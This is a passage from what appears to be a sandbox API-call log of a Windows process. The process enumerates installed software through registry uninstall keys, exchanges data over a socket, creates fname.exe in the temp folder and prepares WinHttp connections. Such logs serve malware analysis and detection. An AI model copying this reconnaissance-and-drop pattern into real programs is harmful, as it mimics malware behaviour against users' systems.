lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x7a) returned 0x0 [0286.342] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d3d40, lpcbData=0x19f2e0*=0x7a | out: lpType=0x19f2e4*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030", lpcbData=0x19f2e0*=0x7a) returned 0x0 [0286.342] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x1a) returned 0x0 [0286.342] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d3ea4, lpcbData=0x19f2e0*=0x1a | out: lpType=0x19f2e4*=0x1, lpData="11.0.61030.0", lpcbData=0x19f2e0*=0x1a) returned 0x0 [0286.342] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.342] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.343] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x7a) returned 0x0 [0286.343] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d4228, lpcbData=0x19f2e0*=0x7a | out: lpType=0x19f2e4*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501", lpcbData=0x19f2e0*=0x7a) returned 0x0 [0286.343] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x1a) returned 0x0 [0286.343] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d438c, lpcbData=0x19f2e0*=0x1a | out: lpType=0x19f2e4*=0x1, lpData="12.0.30501.0", lpcbData=0x19f2e0*=0x1a) returned 0x0 [0286.343] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.343] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.343] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x78) returned 0x0 [0286.344] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d4710, lpcbData=0x19f2e0*=0x78 | out: lpType=0x19f2e4*=0x1, lpData="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219", lpcbData=0x19f2e0*=0x78) returned 0x0 [0286.344] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x16) returned 0x0 [0286.344] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d486c, lpcbData=0x19f2e0*=0x16 | out: lpType=0x19f2e4*=0x1, lpData="10.0.40219", lpcbData=0x19f2e0*=0x16) returned 0x0 [0286.344] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.344] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.344] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.344] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.344] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.344] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.345] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.345] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.345] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.345] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.345] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.345] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.345] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.345] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.345] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.345] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.346] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.346] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.346] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.346] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.346] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.346] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.346] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.346] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.346] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.346] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.347] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.347] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.347] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.347] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.347] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x7c) returned 0x0 [0286.347] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d5894, lpcbData=0x19f2e0*=0x7c | out: lpType=0x19f2e4*=0x1, lpData="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005", lpcbData=0x19f2e0*=0x7c) returned 0x0 [0286.347] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x16) returned 0x0 [0286.347] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d59f8, lpcbData=0x19f2e0*=0x16 | out: lpType=0x19f2e4*=0x1, lpData="12.0.21005", lpcbData=0x19f2e0*=0x16) returned 0x0 [0286.347] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.347] RegCloseKey (hKey=0x2ec) returned 0x0 [0286.382] CoCreateGuid (in: pguid=0x19efd4 | out: pguid=0x19efd4*(Data1=0xa808270, Data2=0x5ab2, Data3=0x44ff, Data4=([0]=0x83, [1]=0x3d, [2]=0xff, [3]=0x6d, [4]=0x6b, [5]=0x7, [6]=0x23, [7]=0x4f))) returned 0x0 [0286.383] CoCreateGuid (in: pguid=0x19ef04 | out: pguid=0x19ef04*(Data1=0x261d5e58, Data2=0x68f, Data3=0x4433, Data4=([0]=0xac, [1]=0xdc, [2]=0xae, [3]=0xec, [4]=0x34, [5]=0xcb, [6]=0xb9, [7]=0x96))) returned 0x0 [0286.384] send (s=0x348, buf=0x3734d17*, len=1471, flags=0) returned 1471 [0286.386] recv (in: s=0x348, buf=0x211b490, len=8192, flags=0 | out: buf=0x211b490*) returned 128 [0286.430] CoCreateGuid (in: pguid=0x19f01c | out: pguid=0x19f01c*(Data1=0x55c4618f, Data2=0x81b6, Data3=0x4858, Data4=([0]=0xa4, [1]=0x21, [2]=0xd8, [3]=0x23, [4]=0xd0, [5]=0x65, [6]=0x6d, [7]=0x1a))) returned 0x0 [0286.430] CoCreateGuid (in: pguid=0x19ef4c | out: pguid=0x19ef4c*(Data1=0x1b326904, Data2=0xe48a, Data3=0x45ae, Data4=([0]=0xab, [1]=0xe7, [2]=0xb7, [3]=0x54, [4]=0x9b, [5]=0x1b, [6]=0xb7, [7]=0x20))) returned 0x0 [0286.431] send (s=0x348, buf=0x3734d17*, len=157, flags=0) returned 157 [0286.432] recv (in: s=0x348, buf=0x211b490, len=8192, flags=0 | out: buf=0x211b490*) returned 112 [0286.481] CoCreateGuid (in: pguid=0x19efe4 | out: pguid=0x19efe4*(Data1=0x2c48799d, Data2=0xdbdb, Data3=0x4f23, Data4=([0]=0xb7, [1]=0x88, [2]=0x2e, [3]=0x1b, [4]=0x4b, [5]=0xb9, [6]=0x13, [7]=0x70))) returned 0x0 [0286.481] CoCreateGuid (in: pguid=0x19ef14 | out: pguid=0x19ef14*(Data1=0x703490b4, Data2=0xc7b9, Data3=0x44d2, Data4=([0]=0xbb, [1]=0x4b, [2]=0xf3, [3]=0x4f, [4]=0x17, [5]=0x3c, [6]=0x1e, [7]=0x8f))) returned 0x0 [0286.482] send (s=0x348, buf=0x3734d17*, len=589, flags=0) returned 589 [0286.482] recv (in: s=0x348, buf=0x211b490, len=8192, flags=0 | out: buf=0x211b490*) returned 386 [0286.620] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2ec [0286.620] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2f0 [0286.628] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e4ac | out: phkResult=0x19e4ac*=0x310) returned 0x0 [0286.629] RegQueryValueExW (in: hKey=0x310, lpValueName="InstallationType", lpReserved=0x0, lpType=0x19e4cc, lpData=0x0, lpcbData=0x19e4c8*=0x0 | out: lpType=0x19e4cc*=0x1, lpData=0x0, lpcbData=0x19e4c8*=0xe) returned 0x0 [0286.629] RegQueryValueExW (in: hKey=0x310, lpValueName="InstallationType", lpReserved=0x0, lpType=0x19e4cc, lpData=0x21e0da4, lpcbData=0x19e4c8*=0xe | out: lpType=0x19e4cc*=0x1, lpData="Client", lpcbData=0x19e4c8*=0xe) returned 0x0 [0286.629] RegCloseKey (hKey=0x310) returned 0x0 [0286.642] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x19dd90 | out: phkResult=0x19dd90*=0x0) returned 0x2 [0286.645] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2a8 | out: phkResult=0x19f2a8*=0x310) returned 0x0 [0286.646] RegQueryValueExW (in: hKey=0x310, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x19f2c4, lpData=0x0, lpcbData=0x19f2c0*=0x0 | out: lpType=0x19f2c4*=0x0, lpData=0x0, lpcbData=0x19f2c0*=0x0) returned 0x2 [0286.646] RegCloseKey (hKey=0x310) returned 0x0 [0286.715] GetACP () returned 0x4e4 [0286.722] ExpandEnvironmentStringsW (in: lpSrc="%tmp%", lpDst=0x19f1dc, nSize=0x64 | out: lpDst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x25 [0286.722] ExpandEnvironmentStringsW (in: lpSrc="%tmp%\\fname.exe", lpDst=0x19f1dc, nSize=0x64 | out: lpDst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe") returned 0x2f [0286.727] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0x19ed04, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16 [0286.730] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\fname.exe", nBufferLength=0x105, lpBuffer=0x19ed18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\fname.exe", lpFilePart=0x0) returned 0x32 [0286.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f20c) returned 1 [0286.730] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\fname.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\fname.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x34c [0286.735] GetFileType (hFile=0x34c) returned 0x1 [0286.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f208) returned 1 [0286.735] GetFileType (hFile=0x34c) returned 0x1 [0286.748] GetCurrentProcess () returned 0xffffffff [0286.748] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ee80 | out: TokenHandle=0x19ee80*=0x2f4) returned 1 [0286.752] GetCurrentProcess () returned 0xffffffff [0286.752] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ee94 | out: TokenHandle=0x19ee94*=0x2f8) returned 1 [0286.756] QueryPerformanceFrequency (in: lpFrequency=0x565e28 | out: lpFrequency=0x565e28*=100000000) returned 1 [0286.757] QueryPerformanceCounter (in: lpPerformanceCount=0x19f29c | out: lpPerformanceCount=0x19f29c*=2618446798466) returned 1 [0286.762] GetCurrentProcess () returned 0xffffffff [0286.762] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ee64 | out: TokenHandle=0x19ee64*=0x3b8) returned 1 [0286.765] GetCurrentProcess () returned 0xffffffff [0286.765] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ee78 | out: TokenHandle=0x19ee78*=0x2fc) returned 1 [0286.917] GetCurrentProcess () returned 0xffffffff [0286.918] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f184 | out: TokenHandle=0x19f184*=0x44c) returned 1 [0287.683] CoTaskMemAlloc (cb=0xcc0) returned 0x5530de0 [0287.684] RasEnumConnectionsW (in: param_1=0x5530de0, param_2=0x19f194, param_3=0x19f198 | out: param_1=0x5530de0, param_2=0x19f194, param_3=0x19f198) returned 0x0 [0288.062] CoTaskMemFree (pv=0x5530de0) [0288.062] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x484 [0288.064] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x488 [0288.065] ioctlsocket (in: s=0x484, cmd=-2147195266, argp=0x19f19c | out: argp=0x19f19c) returned 0 [0288.065] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x48c [0288.065] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x490 [0288.065] ioctlsocket (in: s=0x48c, cmd=-2147195266, argp=0x19f19c | out: argp=0x19f19c) returned 0 [0288.066] WSAIoctl (in: s=0x484, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f184, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f184, lpOverlapped=0x0) returned -1 [0288.118] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19eeb4, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0288.140] WSAEventSelect (s=0x484, hEventObject=0x488, lNetworkEvents=512) returned 0 [0288.140] WSAIoctl (in: s=0x48c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f184, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f184, lpOverlapped=0x0) returned -1 [0288.141] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19eeb4, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0288.141] WSAEventSelect (s=0x48c, hEventObject=0x490, lNetworkEvents=512) returned 0 [0288.141] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x498 [0288.141] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x498, param_3=0x3) returned 0x0 [0288.155] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x19f1b0 | out: phkResult=0x19f1b0*=0x4b0) returned 0x0 [0288.157] RegOpenKeyExW (in: hKey=0x4b0, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f160 | out: phkResult=0x19f160*=0x4b4) returned 0x0 [0288.157] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4b8 [0288.157] RegNotifyChangeKeyValue (hKey=0x4b4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4b8, fAsynchronous=1) returned 0x0 [0288.159] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f164 | out: phkResult=0x19f164*=0x4bc) returned 0x0 [0288.160] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4c0 [0288.160] RegNotifyChangeKeyValue (hKey=0x4bc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4c0, fAsynchronous=1) returned 0x0 [0288.161] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f164 | out: phkResult=0x19f164*=0x4c4) returned 0x0 [0288.161] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4c8 [0288.161] RegNotifyChangeKeyValue (hKey=0x4c4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4c8, fAsynchronous=1) returned 0x0 [0288.162] GetCurrentProcess () returned 0xffffffff [0288.162] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f158 | out: TokenHandle=0x19f158*=0x4cc) returned 1 [0288.167] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea68 | out: phkResult=0x19ea68*=0x4d0) returned 0x0 [0288.167] RegQueryValueExW (in: hKey=0x4d0, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x19ea84, lpData=0x0, lpcbData=0x19ea80*=0x0 | out: lpType=0x19ea84*=0x0, lpData=0x0, lpcbData=0x19ea80*=0x0) returned 0x2 [0288.167] RegCloseKey (hKey=0x4d0) returned 0x0 [0288.253] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x5d6ed0 [0288.269] WinHttpSetTimeouts (hInternet=0x5d6ed0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0288.270] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x19f164 | out: pProxyConfig=0x19f164) returned 1 [0288.795] CoTaskMemAlloc (cb=0x20c) returned 0x5508b90 [0288.795] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x5508b90, nSize=0x104 | out: lpBuffer="") returned 0x0 [0288.795] CoTaskMemFree (pv=0x5508b90) [0288.795] CoTaskMemAlloc (cb=0x20c) returned 0x5507ea0 [0288.795] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x5507ea0, nSize=0x104 | out: lpBuffer="") returned 0x0 [0288.795] CoTaskMemFree (pv=0x5507ea0) [0288.800] EtwEventRegister (in: ProviderId=0x21e892c, EnableCallback=0x4e107ce, CallbackContext=0x0, RegHandle=0x21e8908 | out: RegHandle=0x21e8908) returned 0x0 [0288.801] EtwEventSetInformation (RegHandle=0x660308, InformationClass=0x55, EventInformation=0x2, InformationLength=0x21e88c8) returned 0x0 [0288.806] GetCurrentProcess () returned 0xffffffff [0288.806] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ee2c | out: TokenHandle=0x19ee2c*=0x514) returned 1 [0288.809] GetCurrentProcess () returned 0xffffffff [0288.809] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ee40 | out: TokenHandle=0x19ee40*=0x520) returned 1 [0288.815] SetEvent (hEvent=0x2ec) returned 1 [0288.842] GetCurrentProcess () returned 0xffffffff [0288.842] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ed80 | out: TokenHandle=0x19ed80*=0x538) returned 1 [0288.843] GetCurrentProcess () returned 0xffffffff [0288.843] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ed94 | out: TokenHandle=0x19ed94*=0x53c) returned 1 [0288.845] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19ef98 | out: lpTimeZoneInformation=0x19ef98) returned 0x2 [0288.846] SetEvent (hEvent=0x2ec) returned 1 [0288.848] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x540 [0288.849] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x544 [0288.849] ioctlsocket (in: s=0x540, cmd=-2147195266, argp=0x19f140 | out: argp=0x19f140) returned 0 [0288.849] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x548 [0288.849] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x54c [0288.849] ioctlsocket (in: s=0x548, cmd=-2147195266, argp=0x19f140 | out: argp=0x19f140) returned 0 [0288.850] WSAIoctl (in: s=0x540, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f128, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f128, lpOverlapped=0x0) returned -1 [0288.850] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19ee58, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0288.850] WSAEventSelect (s=0x540, hEventObject=0x544, lNetworkEvents=512) returned 0 [0288.850] WSAIoctl (in: s=0x548, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f128, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f128, lpOverlapped=0x0) returned -1 [0288.850] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19ee58, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0288.850] WSAEventSelect (s=0x548, hEventObject=0x54c, lNetworkEvents=512) returned 0 [0288.857] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, 